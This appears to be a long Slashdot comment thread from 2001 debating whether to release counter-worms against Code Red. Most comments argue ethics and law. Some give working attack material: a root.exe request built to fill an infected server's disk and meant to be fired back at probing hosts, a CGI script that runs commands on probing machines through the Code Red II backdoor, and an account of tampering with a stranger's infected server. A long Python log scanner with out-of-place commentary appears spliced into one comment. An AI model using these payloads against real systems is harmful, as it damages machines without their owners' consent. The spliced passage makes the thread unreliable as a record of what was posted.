    Why does this reduce the bandwidth? Because the counter infected machine almost certainly has the virus if the retrovirus can come in. Then the retrovirus kills the regular virus, and takes the bandwidth that the old code red was using as its own. Thus there is no increase in usage. But OTOH many machines are infected many times, so it would almost certainly reduce the worm bandwidth usage. Also, a machine that has been counterinfected cannot be counterinfected again, so there is no risk of multiple infections on a counter-infected machine. (BTW one might want to add in that any server that probes the infected machine should also be counter-infected. Make the probes from the retrovirus and regular virus look different. Then again this is just getting fancy and doesn't need to be added)
    And let's not forget the infection rate. You can expect it to be less than the code red because it cannot have multiple infections on the same machine, but even then it should get hundreds of thousands of machines in a few weeks, certainly. And if these machines are all patched, and after 24 hours the countervirus stops operating on a new machine, then you would have drastic bandwidth reduction. So what do we have?
    First: the bandwidth usage of a counter infected machine is the same or less than that machine infected.
    Second: the bandwidth is less after the machine is 'clean'
    There will be a few machines that are 'innocent bystanders' which will add slightly to the overall bandwidth, but that will most likely not be significant (I have no idea how to calculate this, but I am going on the assumption that the CR virus is already on 95% of machines that it can get on. More than 5% of machines cross-infected is not such a leap of faith, especially when considering the code red 2 virus could be considered a cross infection! By MSNBC's stats at least 1/3 of machines infected by CR1 are infected by CR2)
    Finally: initial spread
    You could simply set up a script that would counterinfect a machine if it probed you. Set that up on some regularly probed servers, and once the probes stop your job is done.
    The ONLY issue is the "taking the law into your own hands"
    But as people have said, you can be forced to take medicine if you are a danger to other people (anti-psychotics anyone?), you can be forced to put your dog to sleep if it has rabies. There is a precedent for this, but it is carried out by the government.
    The biggest problem with a 'vigilante' approach is that if someone were to do it and get caught, then they would possibly be scapegoated. What we need is for someone in a government agency (FBI, CIA, or NSA to name a few) to do it. Especially those last two.
    Or someone else could just post HOW to do it (as anonymous coward of course) somewhere... and a lot of people on /. could all do it. I mean, a couple hundred. What is uncle sam gunna do, jail a few hundred people for fixing our own infrastructure? If no one goes out and makes it very obvious that they did it, then is the FBI going to go out of their way to catch you?

    --
    Free as in *BUUURP!*
  368. Re:Its entirely possible by Unknown+Bovine+Group · · Score: 1
    This is wonderful advice, so long as your morality system can be summed up as "don't get sued".

    Ask your lawyer the same question about an injured person lying in the street. If you do nothing, they can't sue you right? But if you try to help them, you might actually injure them and they'll sue you. Does this mean the RIGHT action is to do nothing? No. It means the legal system is fucked.

    "All that is necessary for the forces of evil to win in the world is for enough good men to do nothing." --Edmund Burke

    --
    m00.
  369. Re:This is a Bad Idea by Anonymous Coward · · Score: 0

    I'm not usually one to spout Libertarian philosophy - but in this case, if somebody wants to leave their box open - through ignorance, laziness, or some other ineffable reason - that is their choice and not the choice of some 15-year-old hacker who thinks he'll redeem his l33t friends' images in the media's eyes.

    Actually, it is illegal to intentionally contribute to the spread of a computer worm such as this one. Of course if they found the person who released it, they'd prosecute. Now, they're not going to get the people who haven't patched, because it's not such gross negligence as to be criminal (not to mention it'd be a waste of time). OTOH, if someone actually wanted to leave their box open to spread these sorts of things, as you suggest, they could likely be prosecuted.

    So, sure, you still can't take the law into your own hands. OTOH, in this case it becomes the feds' choice.

  370. Re:Take it one step further... by sommere · · Score: 1

    this is fine, except that you then have done all the hard work for making a quieter (because it only attacks infected servers) even more harmful worm. Say one that overwrites the partition table on the anniversary of the DMCA being passed :)

  371. Whoa... by Dfiant · · Score: 1

    I had the exact same idea yesterday while talking to a friend. I dismissed it because I'd probably be jailed for DMCA violation (copying a buffer overflow mechanism), "damages" (down time for server restarts), and being a "hacker". ;-)

  372. Re:Why do favors? by haruharaharu · · Score: 1

    If I install Win2K or NT on a box connected to the net right now, there is a high probability I will be infected before I can even apply the patch. That's a fact.

    That's why you don't connect a machine externally until you've patched it.

    --
    Reboot macht Frei.
  373. Let Security Focus take care of it by Anonymous Coward · · Score: 0

    I know that even if I got on a windows box, I don't think that I could work it. But here is an Apache module I saw on the mod_perl mailing list that will report the Code Red worm to Security Focus, and try to email the admin of the infected box.

  374. Re:Cure as bad as the disease? by Anonymous Coward · · Score: 0

    Off-topic self-response:

    Look, I don't want to fault the Gates' philanthropy per se, I just wonder what strings are attached. I'm a Unix-head pretty much, and I learned Unix on a 4.2 BSD Vax. Good move for Digital to play to the edu market, but it meant I didn't get to learn anything about DNOS on the TI 990/12 that the school actually ran on. So I tend to blame Digital as much as MS, IBM, or anybody else that there never was a 32 or 64-bit version of the TMS99000 processor to port Linux to. Discounting the Sparc, which is sort of half 9900.

    I've seen some of the new CS buildings in my state. All windows boxes. Gone are the Vazen, of course, and the TI's, even the S1500's, but also no more HP 9000's, SGI's, Suns, IBM medium and big iron, etc. Don't see any Alphas. Or even any Macs. Very, very monoculture. Impresses the rubes, maybe, but the experienced eye will see that either the business dept. has taken over completely, or the academics have completely abdicated. Not very reassuring, and it goes way beyond the computers.

    Yes, even Linux and BSD users are vulnerable to worm attacks if they don't stay on guard, and, despite a comment I made the other day about lusers who happened to be running W2K, you can secure IIS like any other server. It's just more difficult and expensive than with free software. Plus the knowledge will be totally obsolete inside of 6 months. Yeah, that $2000 MCSE training course was WELL worth the money.

    I'm kicking myself now for even considering an anti-worm, at least publicly, because the potential avenues for abuse are really sinking in to me. It's really a bad, bad idea now that I think more about it. *ESPECIALLY* as public policy.
    Do what you have to do, on a host by host basis, but for crying out loud don't talk about it here.

    Maybe people will start to wise up after the crooks, and I don't mean script-kiddie vandals, get through rifling through all those rooted boxes. Oh well, at least "consumer spending" is going to be up for a couple of months.

    Rogue Bolo

  375. I am living proof that you are wrong. by Anonymous Coward · · Score: 0
    ...everybody who *could* write something like that either (a) recognizes that infecting someone's box is infecting someone's box, closing holes or not or (b) sees no problems in having the rooted boxen out there anyway. I doubt that anybody else actually has the skills to do it.
    "There are more things in heaven and earth, Horatio, than are dreamt of in your philosophy." Hamlet; Act I Scene 5, line 166

    ==not looking to be busted, so posting anonymously==
  376. Who are these people? by PohlioVirus3 · · Score: 1

    I've been using computers for 15 years now, for fun, for work, etc. I have never understood why viruses are created. Maybe people hate Microsoft, so maybe they write a virus to exploit Windows computers. I don't know. Do any of you slashdot people know virus-writers personally? I would really love to know what their motivations are. I know several people, good people, whose lives have been devastated by a computer virus, and I think it's quite unfair.

    1. Re:Who are these people? by Fortuno · · Score: 1
      I think they have one of two motives:
      • They want to prove they can. Like the school bullies that, when asked why they beat people up, say "Because I can! Want to make something of it?"
      • They are just plain mean. They like to know that they have given somebody a royal pain in the butt.

      But this is just my humble opinion...
      --


      -- geekcode: GU d-- s+: a---- C++ UL++ P-- L++ E--- W++ N++ o K- w-- O M- V- PS PE- Y PGP- t 5 X R tv+ b
  377. Too many combinations by Anonymous Coward · · Score: 0

    You would have to know about the virus and what it does in order to write a virus to counter it. If you are lucky enough to get ahead of the virus (i.e. Code Red) it may work... but how do you write a virus for a potential virus? I think they call those programs that run in background processes looking for an unknown virus heuristic (sp?) anti-virus scanners :)

  378. Re:Its entirely possible by Isofarro · · Score: 1

    Keep in mind that nearly every law that outlaws hacking is based on "unauthorized access."

    Define "unauthorised access". All it takes to run a program on an infected box is an HTTP request. So are all HTTP requests "unauthorised"?

    Let's say only "linked" URLs are authorised - so any link you click is okay, but you can't enter http://www.slashdot.org in the location bar of your browser - so authorised HTTP requests must encompass this.

    So if entering http://www.slashdot.org is authorised, why not http://www.infectedbox.com/cmd.exe?somefunnystringthatdoessomethingonthewebserver ? Since in both cases they are HTTP requests, one could be a static page, but the other is a call to a server-side script.

    IMO any HTTP request to a webserver connected to the Internet is authorised unless it's explicitly stated otherwise and/or causes visible damage, harm or loss to the website owner - such as a Denial of Service.

  379. Cheese Worm by robt · · Score: 1, Informative
    This exploit has already been done, closing insecure ports on Linux systems, as reported here:

    http://news.cnet.com/news/0-1003-200-5949401.html

    http://news.zdnet.co.uk/story/0,,s2086609,00.html

    http://www.infowar.com/iwftp/icn/17May2001_New_worm_patches_linux_vulnerabilities.shtml

    http://www.securitynewsportal.com/article.php?sid=437

    Also interesting for history buffs is the Internet Worm of 1988 that shut down the internet!

    http://world.std.com/~franl/worm.html

    Could it still happen?

  380. Re:Don't be a part of the problem - cliff's notes by Anonymous Coward · · Score: 0

    "The dead have risen and are voting Republican!" --Bart Simpson That's because here in Chicago the dead are getting tired of voting democrat.

  381. Hey asshole messages... by Anonymous Coward · · Score: 0

    I have started to call the places that are near the top of my 'attempted infections' list and leave messages for people (ask for man in charge, settle for their incompetent IT department) to the effect of:

    Hi there asshole. Your host, 1.2.3.4, has attempted to infect my network 12,736 times since 4 AM Sunday. (Yes, I monitor infection attempts from a Redhat host with the usual log rotation!) Why don't you patch your piece of shit Windows host, disconnect yourself from the Internet, and fire your incompetent or lazy ass. Thank you.

  382. counter-virus by drizuid · · Score: 1

    I looked at this and immediately remembered an article I read concerning the BIND exploitations. A man coded a worm, which went to all susceptible boxes, exploited the BIND hole, gained root access, patched the holes, and proceeded to the next systems to continue its work. It worked quite well, and you can all say hi to him when he gets out of prison. Whether your intentions are good or not, if you code something that enters another's system without their explicit permission, you are breaking the law. It may be a great idea, and I think it is, but is it worth dealing with the law?

  383. Re:Why do favors? by elefantstn · · Score: 2

    If I install Win2K or NT on a box connected to the net right now, there is a high probability I will be infected before I can even apply the patch. That's a fact.

    If I install Linux/BSD/etc with Apache on a box connected to the net, I will end up with an access.log full of default.ida?XXXXXXXXXXXXX requests and nothing more. That's a fact.

    It's disingenuous to say that the indexing hole is comparable to "some CGI script," because that CGI script is not a default component of the Apache installation. The relative security records of Apache and IIS are not the result of "open" vs "proprietary" development models, they are the result of the attitudes of the respective developers towards the need for new features and accountability to end users. IIS doesn't end up with more holes because it's "closed-source," but because it's designed to add as many features as possible and install those by default. This isn't an ideological difference, it's a difference in good development practices.

    --
    If it ain't broke, you need more software.
  384. That doesn't solve the problem. by Mustang+Matt · · Score: 3, Informative

    The solution is twofold.
    A: Microsoft needs to release more secure OS/Web servers.
    B: People need to patch their system themselves or take it off the net.

    --
    The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
  385. Cure as bad as the disease? by harborpirate · · Score: 1

    Say you could create a worm that fixed the problem.. Aren't you potentially making the problem that much worse? I can just see two worms endlessly chasing each other around the net, wasting tremendous amounts of bandwidth. If the white hat worm went and patched the security hole that the first worm uses to get itself in, this wouldn't occur, but wouldn't you still have thousands of white hat worms spraying the net with data instead? The number of potential problems created by releasing a "predator" worm into the net environment could potentially be disastrous, not the least of which is the bandwidth that would be used up by rabid worms.

    --
    // harborpirate
    // Slashbots off the starboard bow!
    1. Re:Cure as bad as the disease? by Anonymous Coward · · Score: 0

      Yeah, unintended consequences are what has held me back more than legal considerations. What if you fuck it up and make things worse? At a minimum there needs to be some kind of control, at least a kill button, it should be developed with some community oversight, and then tested on a rigorously isolated subnet first.

      I'm not happy at all with the idea of mucking around inside other people's computers as a matter of public policy. This may well be or become an overriding emergency and indeed a matter of public safety, so responsible parties should be working on it, but in the long run, we need to give people the tools to secure their servers, and expect them to use them, not pander to consumerist fantasies of brainless appliance use and total irresponsibility.

      Uh-oh. I see Bill and Melinda have just endowed new CS buildings at half-a-dozen universities. Anybody want to guess what those machines will be running?
      Oh, well, it was a thought, anyway.

      Rogue Bolo

  386. Re:Its entirely possible by Chris+Burke · · Score: 1

    Whoever the fuck modified my comment as insightful is a flaming retard. So I guess I should say "thank you" for keeping the standard of /. moderation consistent.

    --

    The enemies of Democracy are
  387. Re:Correction Was:You could do that, but don't! by RedX · · Score: 2

    Nope, you didn't /. any of those, but you did save me some time in tracking down a CRII-infected server to play with. Seems you can manipulate the files in the \inetpub directory, but very few anywhere else. Making a dir on the desktop didn't work, but their index.asp has been renamed. Hopefully an admin with 1% of a clue is supporting this server.

  388. It sounds like a good idea, but.. by Anonymous Coward · · Score: 0
    Look, as I understand it, the big problem with the code red virus is the amount of network traffic it creates while trying to find vulnerable computers.

    So, you've got a worm out there, trying to find a new host, taking up bandwidth. Now release into this a second worm, using the same amount of bandwidth, if not more, because it has to carry the patch with it to do its job. Suddenly, you've got twice the problem you did before. No, you could just write a program that listens for the worm's signature http request, and only fixes that one server, but even that has its problems.

    The solution to this is not a worm arms race to see who can write the best worms and counter-worms; it is proper system administration. Any other solution is stopgap at best.
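    Several posts above circle the same passive alternative: the "attempted infections" list in comment 381, the access.log full of default.ida requests in comment 383, and the program that "listens for the worm's signature http request" in this one. What that looks like on the defender's side, as an added example that is not code from any of the posters, is a small log scanner: it parses Apache combined-format access_log lines (the sample lines below are constructed, with documentation-range addresses), recognises the worm's request signature, and ranks the sources that hit you most. The signature check keys on the padding character after default.ida? (the original Code Red padded with N, Code Red II with X), so the report also tells you which variant each source is running. The log format, the 16-character padding threshold and the sample data are this example's assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed Apache combined-format access_log lines for the demo.
# The source addresses are documentation ranges and the worm requests
# are shortened to just the recognisable default.ida signature.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Aug/2001:04:12:01 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 281 "-" "-"
10.0.0.5 - - [05/Aug/2001:04:12:09 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 281 "-" "-"
192.0.2.77 - - [05/Aug/2001:04:13:44 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 281 "-" "-"
198.51.100.9 - - [05/Aug/2001:04:14:02 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
10.0.0.5 - - [05/Aug/2001:04:15:30 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 281 "-" "-"
this line is garbage and must be skipped, not crash the scanner
"""

# Apache combined log: ip ident user [timestamp] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Worm signature: /default.ida? followed by a long run of one padding
# character. 16 or more repeats is an assumed threshold that keeps a
# stray short query from being counted as a worm hit.
SIGNATURE_RE = re.compile(r'^/default\.ida\?(?P<pad>[XN])(?P=pad){15,}', re.IGNORECASE)


def classify_request(path):
    """Return 'CodeRed', 'CodeRedII' or None for a request path."""
    m = SIGNATURE_RE.match(path)
    if not m:
        return None
    return "CodeRedII" if m.group("pad").upper() == "X" else "CodeRed"


def parse_line(line):
    """Parse one access_log line into a dict, or None if it is not a log line."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(log_text):
    """Return {source_ip: Counter({variant: hits})} for signature hits only."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line: skip rather than abort the whole scan
        variant = classify_request(rec["path"])
        if variant:
            hits[rec["ip"]][variant] += 1
    return hits


def top_sources(log_text, n=10):
    """Busiest probing sources first: list of (ip, total_attempts)."""
    hits = scan_log(log_text)
    totals = [(ip, sum(c.values())) for ip, c in hits.items()]
    totals.sort(key=lambda t: (-t[1], t[0]))
    return totals[:n]


def report(log_text):
    """Human-readable lines, one per source, suitable for an abuse report."""
    hits = scan_log(log_text)
    out = []
    for ip, total in top_sources(log_text):
        variants = ", ".join(f"{v}={c}" for v, c in sorted(hits[ip].items()))
        out.append(f"{ip}: {total} attempt(s) ({variants})")
    return out


if __name__ == "__main__":
    for line in report(SAMPLE_LOG):
        print(line)
```

    Pointed at a real access_log (read the file and pass its contents to report), this gives the per-source count that comment 381 is phoning around with, and the variant column tells you whether a source is still running the original worm or Code Red II. It only reads your own logs; nothing is sent back to the probing host.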

  389. Leaving aside the issue of ethics... by yukondude · · Score: 1

    Even if one were to send out an anti-virus to "fix" Code Red II, there's no guarantee that the backdoor hasn't already been used to insert far more dangerous code. Now the user may check for root.exe or the registry settings, decide he or she wasn't infected, and merrily go about their business. Meanwhile their machine is patiently waiting for the next DDoS command.

    Better the user nuke and pave an infected machine and learn that painful lesson.

  390. A virus writer could say: by Johnny5000 · · Score: 1

    You're writing an anti-virus virus?

    Well, I'm writing an anti-anti-virus virus!

    ...

    (days pass)

    OK, then I'm writing an anti-anti-anti-anti-anti-anti.... anti-virus virus!

    -J5K

    --
    The libertarian solution to the failures of capitalism is to apply more capitalism til the failures are fixed.
  391. Not always by Anonymous Coward · · Score: 0

    She may not have done if she were just in the back garden, without her key :-)

    1. Re:Not always by WNight · · Score: 2

      Perhaps she'd have been a bit annoyed, but if he saw her leave, and she went far enough that he lost sight of her, it would also be enough time for a burglar to get in.

      She might have to call to get someone with a spare key to come over, or at most, a locksmith whose price I'm sure Startled would have paid half of, but it's a small price to pay compared to having your stuff gone, or someone waiting inside when you come home...

      And if she did want it that way, she need only tell him once and he'll never help her that way again.

      It's never happened to me, but if I was in a parking lot and saw an unlocked car without an obvious alarm, I'd open the door, lock it, and close it. To avoid risk of a theft charge, I'd get a random passer-by to witness it, so that it was obvious I was only locking the door if the owner came back right then. But I would lock the door. I don't want anyone to have to pay out a large deductible and lose their CDs, etc. That sucks.

  392. Non-Windows solutions by totallygeek · · Score: 1
    I don't really think sending out a fix is the way to go. Honestly, something like Code Red is good, because it will demonstrate how bad closed-source architecture is not viable. It will shut the mouths of the advertising engine out there that Microsoft is the way to go for serving Internet applications.

    I have hit many brick walls trying to implement Linux or OpenBSD in organizations. One company was told by their software vendor that having a Linux box on their network would hurt their NT server -- so they ran MS Proxy for Internet access instead of a NAT box, and it never works right. Another company replaced a working web server (Linux) with a Windows 2000 box just because they made a policy to strictly run Windows in their organization.

    I do not like virus authors and worm writers, but it has been great to go into a company and say here is why you should not use Outlook. Or, here is why you should run Apache on Linux.

  393. Re:Its entirely possible by psychalgia · · Score: 1

    pay a fucking law student, they're everywhere, and I'll be damned if they won't work for peanuts. If I was into law/sci-fi, working for you guys would look AWESOME on my resume... I mean, think about that, you can't BUY real world experience like the kind of work you would get here...

    --

    ________________________________________________

  394. this is not legal by egomaniac · · Score: 2

    Lots of people here are saying "this is legal because you have good intentions" ... which is, of course, absolutely not true.

    Imagine you got home after work one day, and found your front door standing wide open. You frantically search the house, and find a complete stranger sitting down at your computer. He cheerfully tells you that your computer was infected with a virus, and that he's going around the neighborhood breaking into people's houses fixing their computers.

    No damage was done, because he merely picked the lock to the front door. You check out your computer and as far as you can tell everything looks fine, so it seems like he was telling the truth.

    Do you:

    A) say "Oh, that's okay! Thanks for fixing it!"
    B) tell him to get the hell out of your house, and then call the police?

    I'm betting the vast majority of you would pick (B). Now (just like all the other idiots on /.) IANAL, but I imagine the courts would be quite willing to see a counter-worm situation similarly. It is not legal, and it could land you in some serious trouble even if your intentions were pure.

    --
    ZFS: because love is never having to say fsck
  395. good way to make $$$ by 1000101b · · Score: 1

    Create an anti-virus that downloads the patch from MS and works in a worm-like fashion with a twist. Limit your propagation to a single domain. You would need to have detailed reports of course. Sell your service to lazy admins and make a pretty penny (for doing nothing.) Sell a new version every time a new virus comes down the pipe. Be sure to include license information that makes it clear you will not be liable for misuse of your program. It could work.

    --
    Live wrong, impostor.
    1. Re:good way to make $$$ by J'raxis · · Score: 1

      Sounds like a new dotcom business model. Too bad you're almost a year late. :)

  396. It has been done... by auf_weiderzen · · Score: 1

    In 1989 the WANK worm infected NASA's DECnet and spread from there to such exotic locales as HEPnet, EUROnet and a couple other fun ones. The worm would infect a system by trying password == username (surprisingly successful) and a couple other basic attacks. Then it would look for a process name like wwdk_1234, where 1234 was just a random number string. The worm would look for this process and if it found it, it would terminate, otherwise it would set up shop. What the heroic sysadmin did was rewrite the code to look for a definite number and if not found it would kill that process and start its infection routine, effectively killing the actual worm and replacing it with the benign version. The hacker later countered by simply looking for that process and killing it then running its infection routine, but for a while the counter-worm worked. -Source: The Underground, by somebody, available online somewhere and in hardcopy. (Okay, so my memory isn't perfect.)

    --
    Lusers, lusers, everywhere and not a LART in sight.
  397. I suppose... by Scoria · · Score: 2

    ... that the Slashdot editors don't read Slashdot.

    This has been discussed on the other three Slashdot stories about Code Red.

    Each time, none of the comments have risen above +1. Some have even been modded down to...

    ... -1, redundant.

    Nevertheless, this is a good idea. You have to remember that not all NT administrators are anything more than employees of a small company trying to see what this "Internet and web server" thing is all about. They'd patch, but they just don't know how. (And yes, I know. If they don't know how to administer it, they shouldn't be trying to.)

    I believe that the United States FBI still counts this as an unauthorized intrusion, so watch out if you do try to inject something like this into the Internet...

    --
    Do you like German cars?
  398. Be Kind, Just Remind by SuperKendall · · Score: 2

    How about instead of actually patching the machine or doing something else to affect the state of the machine (like turning off the web server), you simply pop-up a message on the screen that says "This machine infected with Code Red, please download update from Microsoft.com/security" or something along those lines. I'm not sure myself how you'd go about raising a message or dialog box but there are probably a number of ways you could do this.

    That way you don't enter the grey area of messing with another user's machine, and since most of these boxes are probably home machines they'll get the message pretty quick that someone can do anything they want with the machine and they should patch it pronto!

    --
    "There is more worth loving than we have strength to love." - Brian Jay Stanley
  399. Re:Its entirely possible by Mr.+McGibby · · Score: 1

    Compare: Adam breaks into my server and steals confidential data. I trace the attack back to Adam, infiltrate his workstation, and perform a destructive format of all of his hard drives.


    This scenario doesn't really make sense as an analogy to the *physical* scenario. If Adam stole your stereo, you have no right to go break into his house and take the stereo back. Once the stuff is stolen, you have to go to the police. Only when you are in imminent danger does the law apply.

    On the other hand, if you saw Adam break into your server and he is about to delete all your files, then you have every right to kick him off your system, even if in the process, you harm his system in some way as long as the methods you use are reasonable and don't do more harm than is necessary. Since kicking him off your system probably won't harm him at all, these laws don't apply very well.

    Once the attack is over, you go to the police. In our society, normal citizens are only allowed to use force that would otherwise be illegal when the police are out of reasonable reach... Like when you have a shotgun in your face.

    --
    Mad Software: Rantings on Developing So
  400. here's a script that'll break their machine by Anonymous Coward · · Score: 0

    or at least fill up the harddisk...

    GET /scripts/root.exe?/c+echo+@echo+off+>fill.bat&echo + echo+a^>a>>fill.bat&echo+:loop+>>fill.bat&echo+typ e+a^>^> a>>fill.bat&echo+goto+loop+>>fill.bat&start+/min+f ill. bat

    I'm sure someone else can do something a little more nasty!

    Now all we need is a few thousand linux machines listening for the crII signature and to send this url back to the machine. That will slow it down dramatically.

  401. Re:Its entirely possible by catfood · · Score: 2, Funny
    I'm sure folks will scream it's illegal and it probably is - but can't a case be made for 'self defense'? I mean if someone brandishes a gun at me am I not within my rights to shoot them or at least take their gun away?...
    Why not apply the same logic to this, they are probing me to infect my server so why can't I probe back and disarm them?

    I didn't ask my lawyer about this, because I know exactly what he would say. "catfood," he'd say, "what happens if you don't send the white-hat virus to those hosts that are probing you?" And I'd say that basically nothing bad will happen to me; I'd just get a couple hundred hosts a day knocking on my door and not getting in. And then my lawyer would say, "and what might happen if you do send the white-hat virus out?" At which point I'd say well, I guess it's remotely possible that I might break something, and the other host's manager might notice it...

    And then my lawyer would say, "Don't be an idiot. You'd be exposing yourself for no benefit to yourself, right?"

    Then I'd say okay, you're right, and my lawyer would send me a bill for $300.00.

    I save a lot of money by asking myself, "what would Tim the Lawyer say?"

  402. Re:This is definitely not a good idea by Keeper · · Score: 2

    There's a small difference here.

    The fact that a hole exists isn't the problem. The fact that a hole is being exploited actively, and being used to propagate software to hundreds of thousands of boxes (causing all sorts of bandwidth problems) is a SERIOUS problem. Compounded by the fact that 90% of the people who are currently infected by it WILL NEVER FIX THE PROBLEM THEMSELVES. This has been going on for almost a week now, and it's only getting worse! My server at home is getting hit by this damn thing multiple times per minute! Hell, after this thing was in the wild for the first 16 hours, I had 355 registered attempts to hit my box with it.

    The app you speak of did four things:
    * it patched holes
    * it left open a new backdoor
    * it tried to spread itself
    * it told no-one what it did

    I'd have no problems with something that patched compromised holes, didn't leave open any backdoors, didn't attempt to spread itself, and told the owner of the box in some fashion what it did. Some would argue that "well, they'll have to wipe the box because who knows what was done by the fix" -- guess what, they should have done that in the first place, because god only knows who else did nasty things before the hole was patched...

  403. What if we use the same exploit for cleaning by Anonymous Coward · · Score: 0

    We could use the same buffer overflow in order to install the patch... not a virus, no self replication, but running a patch installer against the systems that appear to be infected according to our logs.

  404. Flu medication by Mazianni · · Score: 1

    There are a lot of medications for the flu. You can find a few dozen at your local pharmacy.

    I think what you meant to ask is if there is a vaccine. The answer is yes, but the flu virus mutates fairly rapidly. Every year there are a few more new strains, and so you have to go get a new flu shot if you want to stay immune.

    SPQA

    1. Re:Flu medication by nidarus · · Score: 1
      There are a lot of medications for the flu. You can find a few dozen at your local pharmacy.

      Ahm, I don't really know what you mean. There're drugs that temporarily reduce the symptoms (paracetamol[..] and aspirin), but they aren't a "cure" for the disease. If you mean antibiotics, these won't work against the flu (or any other virus, afaik).

      Bah, I know it's petty and kinda silly, but this mistake annoys me so (why flu? why not, say, tuberculosis? ah, maybe because you CAN treat a person with tb against his will, since public health is involved, as one /.er noted, ah).

  405. You could use the hole to _warn_ the sysadmins by marsvin · · Score: 1

    I've put the following CGI as default.ida on several webservers:


    #!/bin/sh
    # Answer the probe with the caller's own address...
    echo "Content-type: text/html"
    echo
    echo "$REMOTE_ADDR"

    # ...and send a warning back to the probing host through the hole it left open.
    /usr/local/bin/wget -q "http://$REMOTE_ADDR/scripts/root.exe?+/c+net+send+127.0.0.1+WARNING!+This+server+has+been+infected+by+the+Code+Red+worm.+See+http://www.emsolutions.nl/codered/+for+help."


    (Add or remove whitespace to taste)

    We've had something like 80 hits in 3 or 4 days on that page. Mind you, some NT admins can't type the URL in correctly...

  406. We've been over that... by Greyfox · · Score: 2
    Creating a new worm and sending it out over the net can be pretty easily classified as illegal, even if it's to a beneficial purpose.

    Somewhat more hazy is setting your web server up to shut down a web server that just scanned you for Code Red II. That would be completely passive and would have a hell of a lot more benefits than drawbacks. If you're evil you could also bill the owner of the server for administrative services (With about 2000 scans since Saturday, I could have made a hefty chunk of change on paper had I been doing this heh.)

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  407. Re:Darwinian Predator - Prey relationship on the n by Satai · · Score: 1

    Eventually chaos theory will dictate that the nature of the relationship has become so complex as to be unknowable.

    And then Jeff Goldblum shows up, ah, showing, ah, us that, ah, nature, nature, ah, finds a way.

  408. Code red and something useful by Anonymous Coward · · Score: 0

    What about something like this? Put in your apache home directory a new default.ida file with these lines:

    <?php header("Location: http://www.causeanaffect.org/thanks.html"); ?>

    Now make .ida extension parseable by php. I don't know if this can work, but...

  409. Re:Its entirely possible by jgerman · · Score: 2

    You'd think so, but there are plenty of cases in turn where the family sues for damages, or even worse murder charges are pressed. Revel in the beauty of the U.S. justice system.

    --
    I'm the big fish in the big pond bitch.
  410. It has happened already by hexx · · Score: 2, Insightful

    Cheese, a Linux worm, did this.
    Read This

  411. Viruses are free... by Anonymous Coward · · Score: 0

    Viruses are free and Antiviruses are NOT. Do YOU see any connection? That's because antivirus software companies like to earn money on people making viruses.

  412. Re:Darwinian Predator - Prey relationship on the n by philovivero · · Score: 1
    So now you have a bunch of viruses, and counter-viruses roaming the net. This is not so bad until you have self-mutating viruses and antigens, several generations down the line. Eventually chaos theory will dictate that the nature of the relationship has become so complex as to be unknowable. This is a Pandora's box we don't want to open.

    Bullshit. It's absolutely a box we want to open. Go read a book on artificial life. Just because you don't understand something doesn't mean it's dangerous to you.

    People fear what they don't know, which is why alife gets such bad treatment in low-brow popular entertainment.
  413. The problem is: by baalzebuth · · Score: 1

    The problem is that anybody can spoof the originating address to look like it is www.whitehouse.gov so the counter attack could be used as a DDoS tool...

  414. It won't work by dybdahl · · Score: 1

    If you look at the viruses that have been made, many of them have destructive effects that were not intended originally. A virus or worm that spreads itself might cause trouble just by spreading - activating firewall warning systems etc.

  415. A case of what is possible not being responsible.. by swdunlop · · Score: 1

    Yes, it is possible to write a counteragent that would infect the same hosts as another worm, remove the worm, and close up the vector, possibly, to prevent a relapse. But, while this action may seem at the outset to be a beneficial thing to do, it is fraught with risks.

    As a case in point, refer to the Morris Worm, which shut down a large part of the Internet in its nascent years. The worm was never meant to be detrimental to its host's health, and was designed to give the author some statistical information about the number of hosts, etc. An error in the worm's propagation routines caused it to overproliferate, swamping the CPU of the servers involved, and bringing the network to a screaming halt.

    You, as the counteragent author, can /not/ be 100% sure that the changes you will make will not have a negative effect on hosts you are trying to repair. Considering the difficulty, today, of producing a truly bug-free piece of software, due partially to glitchy libraries, I would consider it very likely that a so-called counter-virus would likely do as much harm as good.

    The ethical thing remains to be informing the individuals who are still propagating, and ensuring your own house is clean. Perhaps we should form some RBL-style blacklist of hosts currently known to be propagating and susceptible to known worms?

  416. Sorry to reinvent the wheel. by hivolt · · Score: 1

    I hardly use NT or 2000. I'm surprised then that the sysadmins didn't install their patches sooner, if Windows is telling them "Hey! I'm vulnerable! Fix me!". Wow. Why did they wait so long?

  417. Re:Its entirely possible by johnwbyrd · · Score: 5, Insightful

    Slashdot desperately needs a full-time lawyer. It's a great site for Internet geek stuff but nobody on the site has the first fucking clue about liability law. That in itself would not necessarily be awful if it were not the case that all discussions here invariably end up with a bunch of laymen talking legal theory. Lawyers, help!

  418. Rehash/summary by AnotherBlackHat · · Score: 2
    Worms bad... Virus bad...

    There have been many suggested responses, in approximate order of grayness:

    1. Do nothing.
    2. Send email to any system that probes yours.
    3. Provide a patch, and make it as easy as possible to download and install.
    4. Have a bot send email to any system that probes yours.
    5. Provide a web page that activates a bot that exploits and patches a system.
    6. Have a bot exploit and patch any system that probes yours.
    7. Have a bot exploit any system that probes yours, and patch it with the bot.
    8. Actively search out infected systems and patch them.
    9. Actively search out infected systems and patch them with something that actively searches for systems.
    10. Write an even more virulent worm that patches systems.

    I feel that arguing the current legality of the above options is meaningless. The question is, which of the above is the right thing to do. Once it's decided what the right thing is, then we can change the law to make that legal.

